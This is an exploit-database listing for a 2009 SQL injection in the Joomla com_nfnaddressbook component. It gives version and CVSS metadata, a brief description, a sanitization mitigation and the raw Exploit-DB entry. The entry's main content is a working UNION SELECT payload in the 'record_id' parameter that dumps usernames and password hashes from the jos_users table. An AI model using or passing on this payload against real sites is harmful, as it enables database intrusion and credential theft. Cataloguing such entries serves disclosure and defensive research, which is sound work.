header-logo
Suggest Exploit
vendor:
Joomla
by:
Snakespc
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From: Joomla 1.5.0
Affected Version To: Joomla 1.5.15
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: a:joomla:joomla
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Joomla com_nfnaddressbook Remote Sql Injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. This vulnerability exists in the com_nfnaddressbook component of Joomla. By manipulating the 'record_id' parameter, an attacker can inject arbitrary SQL queries into the application. This can be exploited to gain access to the application's database and potentially gain access to sensitive information.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

==============================================================================
[»] Joomla com_nfnaddressbook Remote Sql Injection Vulnerability
==============================================================================
   
[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_crist4l@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ DrEadFul, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
   
###########################################################################
 ===[ Exploit ]===
   
[»] http://localhost/joomla/index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
[»]Author: DrEadFul<-
###########################################################################

Navigation

Suggest Exploit

Services By CQR